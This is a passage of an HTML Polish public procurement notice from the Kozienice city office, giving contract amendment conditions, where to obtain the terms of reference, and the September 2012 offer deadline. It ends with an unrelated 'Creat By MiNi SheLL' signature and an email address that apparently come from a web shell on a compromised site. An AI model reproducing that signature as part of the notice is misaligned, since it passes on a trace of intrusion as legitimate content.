Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest pod warunkiem gdy nowy podwykonawca wykaże spełnianie warunków udziału w postępowaniu w zakresie wskazanym na etapie postępowania o zamówienie publiczne, przedkładając wymagane dokumenty. 
5.Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania 
           umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku  
           akcyzowego.
6.Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, w 
                                       szczególności na jej zakres,termin.
7.Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com